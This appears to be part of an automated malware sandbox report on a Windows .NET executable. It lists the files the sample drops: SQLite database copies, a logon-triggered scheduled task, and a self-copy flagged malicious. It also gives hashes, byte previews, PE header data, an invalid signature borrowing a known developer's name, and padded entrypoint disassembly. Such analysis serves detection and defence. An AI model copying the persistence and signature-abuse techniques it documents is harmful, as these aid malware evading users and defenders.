                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                    MD5:349E6EB110E34A08924D92F6B334801D
                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpE0E.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):49152
                    Entropy (8bit):0.8180424350137764
                    Encrypted:false
                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                    MD5:349E6EB110E34A08924D92F6B334801D
                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpE0F.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):49152
                    Entropy (8bit):0.8180424350137764
                    Encrypted:false
                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                    MD5:349E6EB110E34A08924D92F6B334801D
                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpE10.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):49152
                    Entropy (8bit):0.8180424350137764
                    Encrypted:false
                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                    MD5:349E6EB110E34A08924D92F6B334801D
                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpE20.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):114688
                    Entropy (8bit):0.9746603542602881
                    Encrypted:false
                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                    Malicious:false
                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpE31.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):114688
                    Entropy (8bit):0.9746603542602881
                    Encrypted:false
                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                    Malicious:false
                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpE32.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):114688
                    Entropy (8bit):0.9746603542602881
                    Encrypted:false
                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                    Malicious:false
                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpE43.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):114688
                    Entropy (8bit):0.9746603542602881
                    Encrypted:false
                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                    Malicious:false
                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpE438.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    File Type:XML 1.0 document, ASCII text
                    Category:dropped
                    Size (bytes):1578
                    Entropy (8bit):5.124571123551611
                    Encrypted:false
                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta2xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTnv
                    MD5:C38D80922C4EDF867B4A55EFC5AE78EE
                    SHA1:BD481B8C56FB90FAE34089F27BE27004D1034A72
                    SHA-256:1228956EB9C9097972026F901C0F552D8591AE6014426161D792E7AAB8B63F29
                    SHA-512:968D910D990128C95BF954FB324FC72B1732120E485B522015757C6F5DE3A30C13AF8387D17F6325A463FE54B99CFC809CF89FBCAD5EECADF0A845807CF08E98
                    Malicious:false
                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                    C:\Users\user\AppData\Local\Temp\tmpE53.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):114688
                    Entropy (8bit):0.9746603542602881
                    Encrypted:false
                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                    Malicious:false
                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpE64.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):114688
                    Entropy (8bit):0.9746603542602881
                    Encrypted:false
                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                    Malicious:false
                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpF9A9.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):49152
                    Entropy (8bit):0.8180424350137764
                    Encrypted:false
                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                    MD5:349E6EB110E34A08924D92F6B334801D
                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpF9BA.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):49152
                    Entropy (8bit):0.8180424350137764
                    Encrypted:false
                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                    MD5:349E6EB110E34A08924D92F6B334801D
                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpF9BB.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):49152
                    Entropy (8bit):0.8180424350137764
                    Encrypted:false
                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                    MD5:349E6EB110E34A08924D92F6B334801D
                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpF9CB.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):49152
                    Entropy (8bit):0.8180424350137764
                    Encrypted:false
                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                    MD5:349E6EB110E34A08924D92F6B334801D
                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpF9CC.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):49152
                    Entropy (8bit):0.8180424350137764
                    Encrypted:false
                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                    MD5:349E6EB110E34A08924D92F6B334801D
                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpF9DD.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):114688
                    Entropy (8bit):0.9746603542602881
                    Encrypted:false
                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                    Malicious:false
                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpF9DE.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):114688
                    Entropy (8bit):0.9746603542602881
                    Encrypted:false
                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                    Malicious:false
                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):530952
                    Entropy (8bit):7.960049488064522
                    Encrypted:false
                    SSDEEP:12288:U/zHU7McQuB029F442iE1Fk2WA/GnGuhzQ5kR:AUJFWDKhQk
                    MD5:A3DD5C4C73ED04342CB2319FF7CFC714
                    SHA1:D92D54D5085CDACAEEBD568C35D066566BC906CF
                    SHA-256:DB6A579EF546405D1C3E44A5F1637BC402136315CE4814D53AA926056F680128
                    SHA-512:9637D3FF5CBC7D0E58559148591B2950612714C1F0EDD1A385D4D1C6518F8C97CBE3FA458E5F6F57117FAF9A55BE03985471E0E4ABB1F6DB840464A276E814AA
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 61%
                    • Antivirus: Virustotal, Detection: 61%, Browse
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x.f....................."........... ........@.. ....................... ............@.................................<...O........ ...............6........................................................... ............... ..H............text........ ...................... ..`.rsrc.... ....... ..................@..@.reloc..............................@..B................p.......H.......$....2......_....................................................0..A....... .........%.R...(.....S... .........%.#...(.....$...(j...*.....&*....0..Q.......~$.......E....'.....................}.......%.}.....}..... ..... ....Y.+...}....*....0..........~$.....~S........E....................=..._...................a.....}...... ....... \....Y.+..(.......o....&.{....-...+....L.+...{....(......{K.........8s.....+..*.{.....{....o....3.......8O..... ..... ....Y+..{.....3...

                    C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe:Zone.Identifier

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Preview:[ZoneTransfer]....ZoneId=0

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.960049488064522
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    • Win32 Executable (generic) a (10002005/4) 49.96%
                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    File name:PzPxqbK89H.exe
                    File size:530'952 bytes
                    MD5:a3dd5c4c73ed04342cb2319ff7cfc714
                    SHA1:d92d54d5085cdacaeebd568c35d066566bc906cf
                    SHA256:db6a579ef546405d1c3e44a5f1637bc402136315ce4814d53aa926056f680128
                    SHA512:9637d3ff5cbc7d0e58559148591b2950612714c1f0edd1a385d4d1c6518f8c97cbe3fa458e5f6f57117faf9a55be03985471e0e4abb1f6db840464a276e814aa
                    SSDEEP:12288:U/zHU7McQuB029F442iE1Fk2WA/GnGuhzQ5kR:AUJFWDKhQk
                    TLSH:2FB4238977981502CE68DA38D2F5D82247B3A14BB291E7EE1CF19E0F84773C89457E4B
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x.f....................."........... ........@.. ....................... ............@................................

                    File Icon

                    Icon Hash:9c306e8c8cb682ac

                    Static PE Info

                    General

                    Entrypoint:0x47df8e
                    Entrypoint Section:.text
                    Digitally signed:true
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66CE789A [Wed Aug 28 01:08:42 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                    Authenticode Signature

                    Signature Valid:false
                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                    Signature Validation Error:The digital signature of the object did not verify
                    Error Number:-2146869232
                    Not Before, Not After
                    • 13/11/2018 00:00:00 08/11/2021 23:59:59
                    Subject Chain
                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                    Version:3
                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                    Serial:7C1118CBBADC95DA3752C46E47A27438

                    Entrypoint Preview

                    Instruction
                    jmp dword ptr [00402000h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add al, 00h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add al, 00h
                    add eax, dword ptr [eax]
                    add byte ptr [eax], al
                    xor byte ptr [eax], al
                    add byte ptr [eax+0000000Eh], al
                    dec eax
                    add byte ptr [eax], al
                    adc byte ptr [eax], 00000000h
                    add byte ptr [eax], al
                    push 18800000h
                    add byte ptr [eax], al
                    add byte ptr [eax+00800000h], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax+eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add dword ptr [eax], eax
                    add dword ptr [eax], eax
                    add byte ptr [eax], al
                    cwde
                    add byte ptr [eax], al
                    add byte ptr [eax], 00000000h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add al, 00h
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x7df3c0x4f.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x2000.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x7e4000x3608
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x800000xc.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

